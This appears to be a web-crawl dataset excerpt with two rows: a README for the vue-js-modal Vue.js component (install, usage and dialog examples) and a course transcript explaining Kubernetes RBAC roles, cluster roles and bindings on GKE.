text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
Simple highly customizable and mobile friendly modal for Vue.js 2 Vue.js modal Simple to use, highly customizable, mobile friendly Vue.js 2.0+ modal with SSR support. Install npm install vue-js-modal --save How to use Include plugin in your main.js file. import VModal from 'vue-js-modal' Vue.use(VModal) /* By default plugin will use "modal" name for the component. If you need to change it, you can do so by providing "componentName" param. Example: Vue.use(VModal, { componentName: "foo-modal" }) ... <foo-modal</foo-modal> */ Create modal: <modal name="hello-world"> hello, world! </modal> Call it from anywhere in the app: methods: { show () { this.$modal.show('hello-world'); }, hide () { this.$modal.hide('hello-world'); } } You can easily send data into the modal: this.$modal.show('hello-world', { foo: 'bar' }) And receive it in beforeOpen event handler: <modal name="hello-world" @ methods: { beforeOpen (event) { console.log(event.params.foo); } } Dialog In version 1.2.8, the <v-dialog/> component was added. It is a simplified version of the modal, which has most parameters set by default and is pretty useful for quick prototyping, showing alerts or creating mobile-like modals. To start using <v-dialog/> you must set dialog: true in plugin configuration: Vue.use(VModal, { dialog: true }) And include it in your project: <v-dialog/> Call it (all params except of “text” are optional): this.$modal.show('dialog', { title: 'Alert!', text: 'You are too awesome', buttons: [ { title: 'Deal with it', handler: () => { alert('Woot!') } }, { title: 'Close' } ] }) Author euvl
https://vuejsexamples.com/simple-highly-customizable-and-mobile-friendly-modal-for-vue-js-2/
CC-MAIN-2019-04
refinedweb
252
53.68
We are still actively working on the spam issue. Talk:Main Page/Archive 1 Contents From previous sticky proposal Muh6trillion (talk) 13:30, 27 January 2014 (EST) logicalincrements.com --Bisasam (talk) 15:02, 27 January 2014 (EST) Links Add more links to the front page. E.g. Really common things that people look to /g/ for advice for, like the headphones page. --InstallFuntoo (talk) 16:52, 27 January 2014 (EST) For that to happen we need information on the specific topic (collect inforaphics to help). I will add some new pages. --Bisasam (talk) 17:18, 27 January 2014 (EST) Can an Admin add the links to previous /g/ wikis here or on the main page so we can get moving articles across? - Oitap — Preceding unsigned comment added by Oitap (talk • contribs) 21:22, 29 January 2014 (UTC) Add a link to Special:AllPages At least until the front page gets sorted out. I agree completely. Please put a link to all pages until there are at least 50+ pages. --Fontain (talk) 18:34, 27 January 2014 (EST) will do. --Bisasam (talk) 18:43, 27 January 2014 (EST) Telecom/Handheld Can I get a Handhelds or Portables cat for phone/telecom/tablet on the front page? — Preceding unsigned comment added by Kek (talk • contribs) 22:57, 28 January 2014 (UTC) — Preceding unsigned comment added by Kek (talk • contribs) 23:22, 28 January 2014 (UTC) Clean up main page Clean up the main page, and add some more links to it. Also, add some more IRC channels to it. Whether you like it or not, most of 4chan (and especially /g/) is on Rizon. — Preceding unsigned comment added by Chchjesus (talk • contribs) 09:26, 29 January 2014 (UTC) Logo I volunteer myself to make a new logo if need be. I don't see much of a problem with the current logo. It could perhaps use a little bit of padding, but I think it looks decent overall. --Placebo (talk) 17:34, 29 January 2014 (EST) Simply using Gentoo's logo isnt the greatest idea. maybe we could add /<logo>/ in the same style to it --Bisasam (talk) 05:33, 4 February 2014 (EST) How does this look? I admit I could probably change the gradient styles and colors. IDK if it's still too much to be using derivatives of the Gentoo logo. Seems fitting tho. --Placebo (talk) 09:50, 10 February 2014 (EST) looks great. can i edit it?--Bisasam (talk) 11:38, 10 February 2014 (EST) - Copyright law is always tricky. It would be in public domain because the wiki is, which means no copyright laws apply to it. However, since this wiki is hosted in USA, U.S. copyright laws also apply here. See wikipedia:Wikipedia:Image_use_policy#Public_domain. I would assume that means the creator published it in public domain so you could do whatever you want, but it's a derivative work based on a work licensed under CC-BY-SA-2.5 (Gentoo logo) so you have to license your work under similar Creative Commons license as well. I will also assume you cannot take a CC-BY-SA work and turn it into PD legally. I'll notify User:Placebo about this so he can choose a CC license. WubTheCaptain (talk) 18:15, 10 February 2014 (EST) - I can upload the SVG if you want. --Placebo (talk) 05:37, 11 February 2014 (EST) - This wiki doesn't allow uploading SVGs yet, I've requested it a few days ago. WubTheCaptain (talk) 19:13, 13 February 2014 (EST) I was thinking something more like this, but less crudely done. Can anyone create a higher quality version maybe? --Gentooinstaller.exe (talk) 00:14, 16 February 2014 (EST) - There's multiple issues: 1. You took the Tux.png name indescriptively that could have been needed by some other file 2. Your file doesn't have a license, so it's in public domain or risk of getting deleted. WubTheCaptain (talk) 18:37, 16 February 2014 (EST) New Layout the new layout makes it possible for non-admins to edit the Todo and Other topics pages. --Bisasam (talk) 09:47, 6 February 2014 (EST) Different Favicon Seriously, this is giving me some whiplash. The favicon is currently the same as the default used for thread updates in 4chan X. If it could be set to anything but its current icon, that would be great. — Preceding unsigned comment added by Watashi (talk • contribs) 10:00, 9 February 2014 (UTC) I think something simple like this would be nice: --SonofUgly (talk) 02:41, 13 February 2014 (EST) - Looks just like 4chan/stylescripts. WubTheCaptain (talk) 17:14, 13 February 2014 (EST) - I prefer Watashi's, but whichever one you guys pick change it fast --Gentooinstaller.exe (talk) 00:54, 16 February 2014 (EST) Favicon updated/replaced. Guide to editing this wiki I've redirected Guide to editing this wiki to wikispace, please change the mainpage link to point to /g/wiki:Guide to editing this wiki with [[:/g/wiki:Guide to editing this wiki|Guide to editing this wiki]]. WubTheCaptain (talk) 22:49, 9 February 2014 (EST) - I also took the decision to name the wikispace as /g/wiki:, if there's something else you'd like to use such as InstallGentoo: then go ahead. Further discussion may be appropriate. WubTheCaptain (talk) 22:50, 9 February 2014 (EST) - Don't you think it should be The /g/ wiki? --Gentooinstaller.exe (talk) 00:51, 16 February 2014 (EST) - The wiki creator had already set the namespace to /g/wiki in config during creation, so it coincidentally happened to be accurate. WubTheCaptain (talk) 03:11, 16 February 2014 (EST) Spambots We need an admin noticeboard instead of editing this talk page, by the way. User:Antoinette95D, User:SalvadorGfu, and many others on Special:Log/newusers could use a banishment. mediawikiwiki:Extension:SpamBlacklist and many others would be very helpful here too. I've always known that CAPTCHA is mostly an useless countermeasure against spambots and how CAPTCHA hurts legitimate users. WubTheCaptain (talk) 17:22, 13 February 2014 (EST) - Spambots are always an issue with small wikis. We do currently have the CAPTCHA prompt for users adding new links. So it's likely that the spammers are human to some degree. I don't know if adding a DNSBL such as project honeypot or spamhaus would help. I found this mediawiki addon: --Placebo (talk) 22:18, 16 February 2014 (EST) Ricing the Front Page Why hasn't this been done yet? We need something to make this place look better. --Gentooinstaller.exe (talk) 00:47, 16 February 2014 (EST) - Have you considered doing it yourself? WubTheCaptain (talk) 03:02, 16 February 2014 (EST) Rant about transclusions Other topics and Todo List should be Template:Main page/Other topics and Template:Main page/Todo list or similar respectively. I can't move them efficiently because they're transcluded. WubTheCaptain (talk) 07:16, 17 February 2014 (EST) - done --Bisasam (talk) 11:16, 17 February 2014 (EST) - "Done?" Excuse me, but do you even wiki? Now we don't have the edit history on those new pages because you didn't move the existing ones there. Solution: Delete the new ones, move the old ones (without redirect). No offense intended, but this is pretty incompetent from a wiki sysop. WubTheCaptain (talk) 11:24, 17 February 2014 (EST) - you really think thats a big deal?--Bisasam (talk) 11:28, 17 February 2014 (EST) - From a wiki's point, yes it is. You're leaving orphan pages behind too, it's about maintenance. WubTheCaptain (talk) 11:30, 17 February 2014 (EST) - in germany we call this bürokratismus--Bisasam (talk) 11:35, 17 February 2014 (EST) Bisasam (Talk | contribs) moved page Other topics to Main page/Other topics without leaving a redirectIt's Template:Main page/Other topics. And lowercase L! Template:Main page/Todo list, sigh. WubTheCaptain (talk) 11:35, 17 February 2014 (EST) - shit. fix'd. why are we doing this again?--Bisasam (talk) 11:41, 17 February 2014 (EST) - No, it's not fixed. Move Template:Main Page/Todo List to Template:Main page/Todo list. WubTheCaptain (talk) 11:44, 17 February 2014 (EST) User creation spam We need a CAPTCHA or other anti-spam device on user registrations, NOW! I've been watching the user registration pages and they're creating new accounts and fucking advertising --Chchjesus (talk) 07:14, 18 February 2014 (EST) - We have had CAPTCHA for a while now, and its helping a lot. --Bisasam (talk) 08:38, 18 February 2014 (EST) - Which hurts users and isn't that effective later when you get 10 registrations bypassing CAPTCHA everyday. We need to ask User:bananafish on IRC to install some antispam extensions. WubTheCaptain (talk) 08:42, 18 February 2014 (EST) I've sandboxed the main page so everyone can make edit proposals. Now I just need some wiki sysop to copy (not move) the contents over to Main Page. It uses templates, so the edit history should be much more cleaner too. I advise to leave the templates unprotected. WubTheCaptain (talk) 16:43, 18 February 2014 (UTC)
https://wiki.installgentoo.com/index.php?title=Talk:Main_Page/Archive_1&oldid=3660
CC-MAIN-2019-39
refinedweb
1,523
64.3
XML::RSS::LibXML - XML::RSS with XML::LibXML: <rss version="2.0" xml: ... <channel> <tag attr1="val1" attr2="val3">foo bar baz</tag> </channel> </rss> All of the fields in this construct can be accessed like so: $rss->channel->{tag} # "foo bar baz" $rss->channel->{tag}{attr1} # "val1" $rss->channel->{tag}{attr2} # "val2" See XML::RSS::LibXML::MagicElement for details. Creates a new instance of XML::RSS::LibXML. You may specify a version or an XML base in the constructor args to control which output format as_string() will use. XML::RSS::LibXML->new(version => '1.0', base => ''); The XML base will be included only in RSS 2.0 output. You can also specify the encoding that you expect this RSS object to use when creating an RSS string XML::RSS::LiBXML->new(encoding => 'euc-jp'); Parse a string containing RSS. Parse an RSS file specified by $filename These methods are used to generate RSS. See the documentation for XML::RSS for details. Currently RSS version 0.9, 1.0, and 2.0 are supported. Additionally, add_item takes an extra parameter, "mode", which allows you to add items either in front of the list or at the end of the list: $rss->add_item( mode => "append", title => "...", link => "...", ); $rss->add_item( mode => "insert", title => "...", link => "...", ); By default, items are appended to the end of the list Return the string representation of the parsed RSS. If $format is true, this flag is passed to the underlying XML::LibXML object's toString() method. By default, $format is true. Adds a new module. You should do this before parsing the RSS. XML::RSS::LibXML understands a few modules by default: rdf => "", dc => "", syn => "", admin => "", content => "", cc => "", taxo => "", So you do not need to add these explicitly. Saves the RSS to a file Syntactic sugar to allow statement like this: foreach my $item ($rss->items) { ... } Instead of foreach my $item (@{$rss->{items}}) { ... } In scalar context, returns the reference to the list of items. Creates, configures, and returns an XML::LibXML object. Used by parse() to instantiate the parser used to parse the feed. Here's a simple benchmark using benchmark.pl in this distribution, using XML::RSS 1.29_02 and XML::RSS::LibXML 0.30 daisuke@beefcake XML-RSS-LibXML$ perl -Mblib tools/benchmark.pl t/data/rss20.xml XML::RSS -> 1.29_02 XML::RSS::LibXML -> 0.30 Rate rss rss_libxml rss 25.6/s -- -67% rss_libxml 78.1/s 205% -- - Only first level data under <channel> and <item> tags are examined. So if you have complex data, this module will not pick it up. For most of the cases, this will suffice, though. - Namespace for namespaced attributes aren't properly parsed as part of the structure. Hopefully your RSS doesn't do something like this: <foo bar: You won't be able to get at "bar" in this case: $xml->{foo}{baz}; # "whee" $xml->{foo}{bar}{baz}; # nope - Some of the structures will need to be handled via XML::RSS::LibXML::MagicElement. For example, XML::RSS's SYNOPSIS shows a snippet like this: $rss->add_item(title => "GTKeyboard 0.85", # creates a guid field with permaLink=true permaLink => "", # alternately creates a guid field with permaLink=false # guid => "gtkeyboard-0.85 enclosure => { url=> '', type=>"application/x-bittorrent" }, description => 'blah blah' ); However, the enclosure element will need to be an object: enclosure => XML::RSS::LibXML::MagicElement->new( attributes => { url => '', type=>"application/x-bittorrent" }, ); - Some elements such as permaLink elements are not really parsed such that it can be serialized and parsed back and force. I could fix this, but that would break some compatibility with XML::RSS Tests. Currently tests are simply stolen from XML::RSS. It would be nice to have tests that do more extensive testing for correctness XML::RSS, XML::LibXML, XML::LibXML::XPathContext Copyright (c) 2005-2007 Daisuke Maki <dmaki@cpan.org>, Tatsuhiko Miyagawa <miyagawa@bulknews.net>. All rights reserved. Many tests were shamelessly borrowed from XML::RSS 1.29_02 Development partially funded by Brazil, Ltd. <> This library is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
http://search.cpan.org/~dmaki/XML-RSS-LibXML-0.3102/lib/XML/RSS/LibXML.pm
CC-MAIN-2013-48
refinedweb
681
67.96
CsvPirate Easily create CSVs of any data that can be derived from any Ruby object (PORO). Summary CsvPirate is the easy way to create a CSV of essentially anything in Ruby, in full pirate regalia. It works better if you are wearing a tricorne! Compatibility - Ruby 1.8.7 (Must also gem install fastercsvand require 'faster_csv') - Ruby 1.9.2, 1.9.3, and 2.0.0 - Rails (ActiveRecord) 2, 3, and 4 Usage Pure Ruby! Doesn't require rails (though it works great with Active Record). My goal is to have it do EVERYTHING it possibly can for me, since almost every project I do needs CSV exports. CsvPirate only works for commissions of swag OR grub! Initialize method (a.k.a new()) takes a hash of parameters, and creates the blank CSV file, and the instance can be modified prior to writing out to CSV: # CsvPirate only works for commissions of swag OR grub! # :swag the ARrr collection of swag to work on (optional) # :grub the ARrr class that the spyglasses will be used on (optional) # :spyglasses named scopes in your model that will refine the rows in the CSV according to conditions of the spyglasses, # and order them according to the order of the spyglasses (optional) # :booty booty (columns/methods) on your model that you want printed in the CSV, also used to create the figurehead (CSV header) # :chart array of directory names (relative to rails root if using rails) which will be the filepath where you want to hide your loot # :waggoner name of document where you will give detailed descriptions of the loot # :aft filename extention ('.csv') # :shrouds CSV column separator, default is ','. For tsv, tab-delimited, "\t" # :chronometer keeps track of when you hunt for treasure # :gibbet filename spacer after the date, and before the iterative counter/timestamp. MuST contain a '.' # :swab can be :counter, :timestamp, or :none # :counter - default, each successive run will create a new file using a counter # :timestamp - each successive run will create a new file using a HHMMSS time stamp # :none - no iterative file naming convention, just use waggoner and aft # :mop can be :clean or :dirty (:overwrite or :append) (only has an effect if :swab is :none) since overwriting is irrelevant for a new file # :clean - do not use :swab above (:counter or :timestamp), and instead overwrite the file # :dirty - do not use :swab above (:counter, or :timestamp), and do not overwrite. Just keep adding on. # :bury_treasure should we store the csv data as it is collected in an array in Ruby form for later use (true), or just write the CSV (false)? # :blackjack. If the array's length is less than the booty array's length it reverts to :humanize =>'_' Check the source to see if there anything else hiding in there! (HINT: There a bunch more undocumented options) The create method has the same parameters, and actually writes the data to the CSV. Avast! Here be pirates! Brush up on pirate coding naming conventions. Install gem install csv_pirate If you are still using Ruby < 1.9 then you will need to add fastercsv to your project. FasterCSV became the built-in CSV library in Ruby 1.9, so is only required if using an older Ruby. gem 'fastercsv', '>= 1.4.0' Upgrading From version prior to 5.0 NinthBit::PirateShip::ActMethods has been deprecated in favor of CsvPirate::PirateShip::ActMethods. Old API still works for now. From version prior to 4.0 :chart was a string which indicated where you wanted to hide the loot (write the csv file) Now it must be an array of directory names. So if you want your loot in "log/csv/pirates/model_name", then chart is: ['log','csv','pirates','model_name'] CsvPirate ensures that whatever you choose as your chart exists in the filesystem, and creates the directories if need be. Usage with ActiveRecord What's the simplest thing that will work? class MyClass < ActiveRecord::Base has_csv_pirate_ship # defaults to csv of all columns of all records end MyClass.blindfold # creates the csv, and returns the CsvPirate instance MyClass.walk_the_plank # creates the csv, and returns contents of the exported data (that was written into the csv) (as a string) MyClass.land_ho # Does Not create the csv, sets up the CsvPirate instance. You can manipulate it and then call .hoist_mainstay on it to create the csv Importing to DB or Ruby objects in memory from CSV Importing abilities are now here! You can dump data to CSV, copy the CSV to wherever, and then import the data in the CSV. Works very well with ActiveRecord. See the weigh_anchor method, added to models with has_csv_pirate_ship defined, for dumping. See the raise_anchor method, added to models with has_csv_pirate_ship defined, for importing. See the to_memory method to convert the data in a csv or CsvPirate instance object back into Ruby class instances with as many attributes as possible set equal to the data from the CSV. Usage without ActiveRecord [ See Spec Tests for more Examples! ] Since the defaults assume an active record class you need to override some of them: class Star extend CsvPirate::PirateShip::ActMethods has_csv_pirate_ship :booty => [:name, :distance, :spectral_type, {:name => :hash}, {:name => :next}, {:name => :upcase}, :star_vowels], :spyglasses => [:get_stars] attr_accessor :name, :distance, :spectral_type def initialize(*args) @name = args.first[:name] @distance = args.first[:distance] @spectral_type = args.first[:spectral_type] end def star_vowels self.name.tr('aeiou', '*') end def self.get_stars [ Star.new(:name => "Proxima Centauri", :distance => "4.2 LY", :spectral_type => "M5.5Vc"), Star.new(:name => "Rigil Kentaurus", :distance => "4.3 LY", :spectral_type => "G2V"), Star.new(:name => "Barnard's Star", :distance => "5.9 LY", :spectral_type => "M3.8V"), Star.new(:name => "Wolf 359", :distance => "7.7 LY", :spectral_type => "M5.8Vc"), Star.new(:name => "Lalande 21185", :distance => "8.26 LY", :spectral_type => "M2V"), Star.new(:name => "Luyten 726-8A and B", :distance => "8.73 LY", :spectral_type => "M5.5 de & M6 Ve"), Star.new(:name => "Sirius A and B", :distance => "8.6 LY", :spectral_type => "A1Vm"), Star.new(:name => "Ross 154", :distance => "9.693 LY", :spectral_type => "M3.5"), Star.new(:name => "Ross 248", :distance => "10.32 LY", :spectral_type => "M5.5V"), Star.new(:name => "Epsilon Eridani", :distance => "10.5 LY", :spectral_type => "K2V") ] end end rails development >a = Star.blindfold => #<CsvPirate:0x2209098 @buried_treasure=[], @mop=:clean, @spyglasses=[:get_stars], @, #<Star:0x2202d10 @, #<Star:0x2202c98 @, #<Star:0x2202c20 @, #<Star:0x2202ba8 @, #<Star:0x2202b30 @, #<Star:0x2202ab8 @, #<Star:0x2202a40 @, #<Star:0x22029c8 @, #<Star:0x2202950 @], @chart=["log", "csv"]> rails development >a.weigh_anchor name,distance,spectral_type,namehash,namenext,nameupcase,star_vowels Proxima Centauri,4.2 LY,M5.5Vc,971295636,Proxima Centaurj,PROXIMA CENTAURI,Pr*x*m* C*nt**r* Rigil Kentaurus,4.3 LY,G2V,-231389024,Rigil Kentaurut,RIGIL KENTAURUS,R*g*l K*nt**r*s Barnard's Star,5.9 LY,M3.8V,1003964756,Barnard's Stas,BARNARD'S STAR,B*rn*rd's St*r Wolf 359,7.7 LY,M5.8Vc,429493790,Wolf 360,WOLF 359,W*lf 359 Lalande 21185,8.26 LY,M2V,466625069,Lalande 21186,LALANDE 21185,L*l*nd* 21185 Luy Sirius A and B,8.6 LY,A1Vm,-969980943,Sirius A and C,SIRIUS A AND B,S*r**s A *nd B Ross 154,9.693 LY,M3.5,-26506942,Ross 155,ROSS 154,R*ss 154 Ross 248,10.32 LY,M5.5V,-18054910,Ross 249,ROSS 248,R*ss 248 Epsilon Eridani,10.5 LY,K2V,931307088,Epsilon Eridanj,EPSILON ERIDANI,Eps*l*n Er*d*n* => #<File:/Users/pboling/RubymineProjects/empty_csv_pirate_app/log/csv/Star.20091004.export.3.csv (closed)> Advanced Usage & Examples Assuming a Make (as in manufacturers of automobiles) model like this: # ## Schema Information # # Table name: makes # # id :integer(4) not null, primary key # name :string(255) # factory :string(255) # sales :integer(4) # class Make < ActiveRecord::Base has_many :vehicle_models named_scope :factory_in_germany, :conditions => ["factory = ?", "Germany"] # Showing all available options with their default values has_csv_pirate_ship :chart => ['log','csv'] # Array of Strings: directory where csv will be created (Yes, it creates all of them if they do not already exist) :aft => '.csv' # String: filename extension, usually this would be '.csv', but can be whatever you want. :gibbet => '.export' # String: Middle part of the filename {the '.' is required for iterative filenames, set :swab => :none to turn off iterative filenames} # Comes after waggoner and chronometer, before swabbie and aft :waggoner => "#{Make}" # String: First part of filename # Must provide :swag or :grub (not both) :swag => nil # Array of objects: to use to create the CSV (i.e. you've already done the query and have the results you want a CSV of) :grub => Make # Class: on which to call the method chain in :spyglasses that will return the array of objects to be placed in :swag by CsvPirate (See description of swag above). :spyglasses => [:all] # Array of symbols/strings: Methods that will be chained together and called on :grub in order to get the :swag records which will become the rows of the CSV. :booty => Make.column_names # Array of symbols/strings or nested hashes of symbols/strings: Methods to call on each object in :swag. These become the columns of the CSV. The method names become the CSV column headings. Methods can be chained to dig deep (e.g. traverse several ActiveRecord associations) to get at a value for the CSV. To call instance methods that include arguments, pass a booty element of an array such as [:method_name, arg1, arg2...]. :swab => :counter # Symbol: What kind of file counter to use to avoid overwriting the CSV file, :counter is Integer, :timestamp is HHMMSS, :none is no file counter, increasing the likelihood of duplicate filenames on successive csv exports. :mop => :clean # Symbol: If we DO end up writing to a preexisting file (by design or accident) should we overwrite (:clean) or append (:dirty)? :shrouds => ',' # String: Delimiter for CSV. '\t' will create a tab delimited file (tsv), '|' will create a pipe delimited file. :bury_treasure => true # Boolean: Should the array of objects in :swag be stored in the CsvPirate object for later inspection? :blackjack => {:humanize => '-'} # Hash: in the array. If the array provided is too short defaults to :humanize =>'_' # A customized version to create a tab delimited file for this class might look like this: # has_csv_pirate_ship :spyglasses => [:factory_in_germany], # :booty => [:id, :name], # :shrouds => '\t' # # keeping the rest of the options at the default values, so they don't need to be defined. end To create a csv of the names and ids of makes with factories in germany and return the text of the export: Make.walk_the_plank # Get it? HA! If you can't believe I wrote this whole thing JUST to be able to make jokes like that... check ma sources :) The name of the csv that comes out will be (by default located in log directory): Make.20090930.export.13.csv Where Make is the class, 20090930 is today's date, .export is the gibbet, and 13 is the iterative file counter, meaning I've run this export 13 times today. All of those filename parts are customizable to a degree. For example if you want to have the date NOT be today's date you can supply your own date: Make.walk_the_plank({:chronometer => Date.parse("December 21, 2012") }) # File name would be: Make.20121221.export.13.csv Make.walk_the_plank({:chronometer => false }) # File name would be: Make.export.13.csv What if you want the file name to be always the same and to always append to the end of it? # Example: I want the file to be named "data", with no extension, both of the following accomplish that: Make.walk_the_plank({:chronometer => false, :gibbet => "", :aft => "", :swab => :none, :waggoner => 'data'}) Make.blindfold(:chronometer => false, :gibbet => "", :aft => "", :swab => :none, :waggoner => 'data') All of the options to has_csv_pirate_ship are available to walk_the_plank, land_ho, and blindfold, as well as to the raw class methods CsvPirate::TheCapn.new and CsvPirate::TheCapn.create, but not necessarily the other way around. You can also customize the CSV, for example if you want to customize which columns are in the csv: Make.walk_the_plank({:booty => [:id, :name, :sales]}) You want a timestamp file counter instead of the integer default: Make.walk_the_plank({:booty => [:id, :name, :sales], :swab => :timestamp}) If you want to append each export to the end of the same file (on a per day basis): Make.walk_the_plank({:booty => [:id, :name, :sales], :spyglasses => [:all], :swab => :none, :mop => :dirty}) If you want to restrict the csv to a particular set of named scopes: Make.walk_the_plank({:booty => [:id, :name, :sales], :spyglasses => [:with_abs, :with_esc, :with_heated_seats]}) If you want to create a tsv (tab-delimited) or psv (pipe-delimited) instead of a csv: Make.walk_the_plank({:booty => [:id, :name, :sales], :shrouds => '\t'}) Make.walk_the_plank({:booty => [:id, :name, :sales], :shrouds => '|'}) If you have a method in the Make class like this: def to_slug "#{self.name}_#{self.id}" end getting it in the CSV is easy peasy: Make.walk_the_plank({:booty => [:id, :name, :to_slug]}) If you want to traverse Active Record Associations, or call a method on the return value of another method (unlimited nesting): Make.walk_the_plank({:booty => [:id, :name, :to_slug, {:to_slug => :hash}]}) #will call .hash on the result of make.to_slug Make.walk_the_plank({:booty => [:id, :name, :to_slug, {:to_slug => {:hash => :abs}}]}) #returns make.to_slug.hash.abs If you want to build your booty using instance functions that require arguments, use an array: Make.walk_the_plank({:booty => [:id, :name, [:value_on, Date.today]}) # will call make.value_on(Date.today) Add whatever methods you want to the :booty array. Write new methods, and add them! Make lots of glorious CSVs full of data to impress the pointy ones in the office. You can also use the raw CsvPirate class itself directly wherever you want. The following two sets of code are identical: csv_pirate = CsvPirate::TheCapn.new({ :grub => User, :spyglasses => [:active,:logged_in], :waggoner => 'active_users_logged_in', :booty => ["id","number","login","created_at"], :chart => ['log','csv'] }) csv_pirate.hoist_mainstay() # creates CSV file and writes out the rows CsvPirate::TheCapn.create({ :grub => User, :spyglasses => [:active,:logged_in], :waggoner => 'active_users_logged_in', :booty => ["id","number","login","created_at"], :chart => ['log','csv'] })# creates CSV file and writes out the rows Another example using swag instead of grub: users = User.logged_out.inactive csv_pirate = CsvPirate::TheCapn.new({ :swag => users, :waggoner => 'inactive_users_not_logged_in', :booty => ["id","number","login","created_at"], :chart => ['log','csv'] }) csv_pirate.hoist_mainstay() Then if you want to get your hands on the loot immediately: csv_pirate.weigh_anchor() For those who can't help but copy/paste into console and then edit: csv_pirate = CsvPirate::TheCapn.new({:grub => User,:spyglasses => [:active,:logged_in],:waggoner => 'active_users_logged_in',:booty => ["id","number","login","created_at"],:chart => ['log','csv']}) OR csv_pirate = CsvPirate::TheCapn.new({:swag => users,:waggoner => 'inactive_users_not_logged_in',:booty => ["id","number","login","created_at"],:chart => ['log','csv']}) Downloading the CSV You have the same Make class as above, and you have a MakeController: class MakeController < ApplicationController def download_csv csv_pirate = Make.blindfold # maroon saves the read to the file system, by using the text of the csv stored in the CsvPirate object. send_data csv_pirate.maroon, ... :type => 'text/csv; charset=iso-8859-1; header=present', :disposition => "attachment; filename=#{csv_pirate.nocturnal}" # However if CSVs are created using multiple CsvPirate objects that all append to a single file, # we need to read the final product from the fs. #send_file csv_pirate.brigantine, # :type => 'text/csv; charset=utf-8; header=present', # :disposition => "attachment; filename=#{csv_pirate.nocturnal}" end end Advanced Example with Nested Methods You have a VehicleModel class and the same Make class as up above: # ## Schema Information # # Table name: vehicle_models # # id :integer(4) not null, primary key # name :string(255) # year :integer(4) # horsepower :integer(4) # price :integer(4) # electric :boolean(1) # make_id :integer(4) # class VehicleModel < ActiveRecord::Base belongs_to :make has_csv_pirate_ship :booty => [:id, :name, :year, {:make => :name}, {:tires => {:size => {:width => :inches}}}] def tires; TireSize.new; end end class TireSize # To call an instance method you need to return an instance def size; TireWidth.new; end end class TireWidth # To call a class method you need to return the class object def width; Measurement; end end class Measurement def self.inches; 13; end end Then to create the CSV: a = VehicleModel.blindfold Then check the output from the console: a.weigh_anchor Id,Name,Year,Make name,Tires size width inches 1,Cavalier,1999,Chevrolet,13 2,Trailblazer,2006,Chevrolet,13 3,Corvette,2010,Chevrolet,13 4,Mustang,1976,Ford,13 5,Lebaron,1987,Chrysler,13 6,Avalon,1996,Toyota,13 => #<File:/Users/pboling/RubymineProjects/empty_csv_pirate_app/log/VehicleModel.20091001.export.2.csv (closed)> Joy to recursive code everywhere! If you wanted to create the CsvPirate object and then modify it before creating the csv you can do that too. Does not actually create the csv, so you need to do this in your code: csv_pirate = VehicleModel.land_ho({:booty => [:id, :name, :year, :horsepower, :price]}) This allows you to modify the csv_pirate object before creating the csv like this: csv_pirate.booty -= [:id, :name] csv_pirate.hoist_mainstay() Tests The tests are run with rspec. The test suite is expanding. Currently there is ample coverage of basic functionality. If on a Ruby prior to Ruby 1.9 you will also need the fastercsv gem To run tests cd to where ever you have csv_pirate installed, and do: bundle exec rake spec How you can help! This code was written in 2008, as one of my first gems, and is aging well, but can certainly be improved.. Compatibility with Micrsoft Excel Microsoft Office (Excel) "SYLK Invalid Format" Error will occur if the string "ID" (without quotes) is at the beginning of the CSV file. This is strangely inconvenient for rails CSVs since every table in rails starts with an id column. So buyer beware... make your first column lower case 'id' if you need to export the id field. Contributing to CsvPir, rspec preferred, for it. This is important so I don't break it in a future version unintentionally. - Please try not to mess with the Rakefile, version, or change log. If you want to have your own version, or is otherwise necessary, that is fine, but please isolate to its own commit so I can cherry-pick around it. On The Web Release Announcement: 'csv_pirate', '~> 5.0' Thanks Thanks go to: - Peter Boling, author of CsvPirate, runs the joint. - TimePerks LLC () - Many useful enhancements were requested and paid for by TimePerks Author: Peter Boling, peter.boling at gmail dot com Copyright (c) 2008-2013 Peter H. Boling of RailsBling.com, released under the MIT license. See LICENSE for details.
http://www.rubydoc.info/github/pboling/csv_pirate/frames
CC-MAIN-2017-47
refinedweb
3,023
57.27
- Training Library - Google Cloud Platform - Courses - GKE Role-based Access Control Authorization via RBAC All right, so I've covered how to create Kubernetes service and user accounts. Now let me cover how to use them. Accounts can be granted or denied permissions for certain actions. Authorization in Kubernetes is accomplished with something called role-based access control or RBAC. In RBAC, you create roles and bind those roles to accounts. So you basically create sets of permissions and then assign them to either service or user accounts. These permissions include things like get, list, create, delete and update. Now, roles work like a white list. There are no deny rules. And by default, all permissions are denied and you have to explicitly grant access where needed. For example, when you first create a Kubernetes service account, it will not have any permissions. Now, permissions are defined in either a role object or a cluster role object. The difference is, role objects require you to specify a namespace. Cluster role objects do not. So if you want to define a set of permissions, but limit it to a namespace, use a role. If you wanna define a cluster wide set of permissions, use a cluster role. Once you have your permissions defined, then you need to assign them to one or more accounts. Roles are assigned by creating a RoleBinding and cluster roles are assigned by creating a ClusterRoleBinding. Actually, it's slightly more complicated than that. You can also use a RoleBinding to assign a cluster role as well. This is useful if you want to assign some defined set of non-namespace permissions, but limit it to a namespace. So that way, if I have 20 namespaces, I don't need to create 20 admin roles. I can create one admin cluster role, which is global, and then I can create 20 RoleBindings to end up with 20 accounts that each have admin permissions limited to a different namespace. RBAC gives you complete control over any changes to your cluster. You can set up accounts to have as many or as few permissions as you need. And remember, accounts can either be user accounts or service accounts. So you control both internal and external access. It's important to note that for a GKE cluster, you can use either RBAC or IAM to control access for user accounts. A user can be granted permissions from either tool. Time for another demo. This time I'm going to show you how to add permissions to the service account we created in a previous lesson. So first I need to create a role. This is what defines the permissions that I want to grant to the account. Now, the format of this command should seem familiar to you at this point. So I'm going to create a role named demo-role-viewer inside demo-namespace-1. Now under rules, you can see that I'm granting list and get. That means it will be able to list out the existing resources, as well as get the details for each resource. Now, it's not going to actually be able to change anything. It can't delete, create or update. So now the role has been successfully created. Now I have to bind it to our account. So I'm going to use a RoleBinding to bind this role to the account named demo-serviceaccount. So you can see I've named the RoleBinding and I've set it to exist in demo-namespace-1. I told it to grant the permissions to demo-serviceaccounts and I passed in the name of the role to be bound, which is demo-role-viewer and it was successful. So at this point, I've authorized demo-serviceaccount to be able to get information about a specific pod or to list out the current running pods. Now I'm not going to bother to actually demonstrate how to use the service account since that would involve a significant amount of work. If you wanna test this out yourself, I will leave that as an exercise for the viewer. Just make sure you remember two main things. Number one, roles and cluster roles define sets of permissions and number two, RoleBindings and ClusterRoleBindings assign sets of permissions to accounts. That's all I have for this lesson. We've got one last topic to cover..
